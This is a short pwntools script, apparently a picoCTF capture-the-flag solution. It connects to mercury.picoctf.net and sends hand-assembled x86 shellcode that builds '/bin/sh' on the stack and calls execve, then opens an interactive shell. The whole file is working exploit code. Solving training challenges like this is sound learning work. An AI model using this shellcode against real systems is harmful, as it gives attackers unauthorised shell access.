#!/usr/bin/env python3 

from pwn import *

# io=process("./fun")
addr="mercury.picoctf.net"
port=37853
io=remote(addr,port)

payload=b'\x31\xC9\x31\xD2\x6A\x00\x6A\x00\x89\xE7\xB3\x2F\x00\x1F\x47\x90\xB3\x62\x00\x1F\x47\x90\xB3\x69\x00\x1F\x47\x90\xB3\x6E\x00\x1F\x47\x90\xB3\x2F\x00\x1F\x47\x90\xB3\x73\x00\x1F\x47\x90\xB3\x68\x00\x1F\x47\x90\x31\xC0\xB0\x0B\x89\xE3\xCD\x80'

io.sendline(payload)

io.interactive()

